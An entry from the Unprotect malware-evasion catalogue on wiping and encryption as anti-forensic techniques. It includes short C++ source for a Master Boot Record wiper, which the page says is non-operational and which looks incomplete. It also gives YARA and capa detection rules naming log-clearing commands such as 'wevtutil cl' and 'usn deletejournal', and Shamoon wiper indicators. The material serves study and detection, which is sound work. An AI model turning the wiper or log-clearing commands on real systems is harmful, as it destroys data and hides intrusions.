Wiping or Encrypting

Malware can use wiping or encryption techniques to remove its trace from the system. They can also use this technique as a decoy but also for sabotage operations.

U0301

Code Snippets

Unprotect

Description

Warning: the code below is a simple MBR wiper. It is currently not operational for obvious reasons.

#include <Windows.h>
#include <iostream>
#include <ctime>
#include <stdio.h>

#define MBR_SIZE 512

using namespace std;

int WipeMBR(void) {
    char dmbr[MBR_SIZE];

    ZeroMemory(&dmbr, sizeof(dmbr));
    HANDLE disk = CreateFile((LPCSTR)"\\\\.\\PhysicalDrive0", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
    WriteFile(disk, dmbr, MBR_SIZE, &write, NULL);
    CloseHandle(disk);
    return 0;
}

int main() {
    cout << "Start Wiping" << endl;
    WipeMBR();
    return 0;
}

Detection Rules

rule UNPROTECT_wiping_event
{
    meta:
        description = "Rule to detect wiping events logs"
        author = "McAfee ATR team | Thomas Roccia"
        date = "2020-11-10"
        rule_version = "v1"
        mitre = "T1070"
        hash = "c063c86931c662c1a962d08915d9f3a8"

    strings:
        $s1 = "wevtutil.exe" ascii wide nocase
        $s2 = "cl Application" ascii wide nocase
        $s3 = "cl System" ascii wide nocase
        $s4 = "cl Setup" ascii wide nocase
        $s5 = "cl Security" ascii wide nocase
        $s6 = "sl Security /e:false" ascii wide nocase
        $s7= "usn deletejournal /D" ascii wide nocase

    condition:
        uint16(0) == 0x5a4d and 4 of them
}

import "pe"

rule Shamoon2_Wiper {
   meta:
      description = "Detects Shamoon 2.0 Wiper Component"
      author = "Florian Roth"
      reference = "https://goo.gl/jKIfGB"
      date = "2016-12-01"
      score = 70
      hash1 = "c7fc1f9c2bed748b50a599ee2fa609eb7c9ddaeb9cd16633ba0d10cf66891d8a"
      hash2 = "128fa5815c6fee68463b18051c1a1ccdf28c599ce321691686b1efa4838a2acd"
   strings:
      $a1 = "\\??\\%s\\System32\\%s.exe" fullword wide
      $x1 = "IWHBWWHVCIDBRAFUASIIWURRTWRTIBIVJDGWTRRREFDEAEBIAEBJGGCSVUHGVJUHADIEWAFGWADRUWDTJBHTSITDVVBCIDCWHRHVTDVCDESTHWSUAEHGTWTJWFIRTBRB" wide
      $s1 = "UFWYNYNTS" fullword wide
      $s2 = "\\\\?\\ElRawDisk" fullword wide
   condition:
      ( uint16(0) == 0x5a4d and filesize < 1000KB and 2 of them ) or ( 3 of them )
}

rule EldoS_RawDisk {
   meta:
      description = "EldoS Rawdisk Device Driver (Commercial raw disk access driver - used in Operation Shamoon 2.0)"
      author = "Florian Roth (with Binar.ly)"
      reference = "https://goo.gl/jKIfGB"
      date = "2016-12-01"
      score = 50
      hash1 = "47bb36cd2832a18b5ae951cf5a7d44fba6d8f5dca0a372392d40f51d1fe1ac34"
      hash2 = "394a7ebad5dfc13d6c75945a61063470dc3b68f7a207613b79ef000e1990909b"
   strings:
      $s1 = "g\\system32\\" fullword wide
      $s2 = "ztvttw" fullword wide
      $s3 = "lwizvm" fullword ascii
      $s4 = "FEJIKC" fullword ascii
      $s5 = "INZQND" fullword ascii
      $s6 = "IUTLOM" fullword wide
      $s7 = "DKFKCK" fullword ascii

      $op1 = { 94 35 77 73 03 40 eb e9 }
      $op2 = { 80 7c 41 01 00 74 0a 3d }
      $op3 = { 74 0a 3d 00 94 35 77 }
   condition:
      ( uint16(0) == 0x5a4d and filesize < 2000KB and 4 of them )
}
rule:
  meta:
    name: clear the Windows event log
    namespace: anti-analysis/anti-forensic/clear-logs
    author: michael.hunhoff@fireeye.com
    scope: basic block
    att&ck:
      - Defense Evasion::Indicator Removal on Host::Clear Windows Event Logs [T1070.001]
    examples:
      - 82BF6347ACF15E5D883715DC289D8A2B:0x14005E0C0
  features:
    - and:
      - api: advapi32.ElfClearEventLogFile
      - optional:
        - api: advapi32.OpenEventLog

Additional Resources

Subscribe to our Newsletter


The information entered into this form is mandatory. It will be subjected to computer processing. It is processed by computer in order to support our users and readers. The recipients of the data will be : contact@unprotect.it.

According to the Data Protection Act of January 6th, 1978, you have at any time, a right of access to and rectification of all of your personal data. If you wish to exercise this right and gain access to your personal data, please write to Thomas Roccia at contact@unprotect.it.

You may also oppose, for legitimate reasons, the processing of your personal data.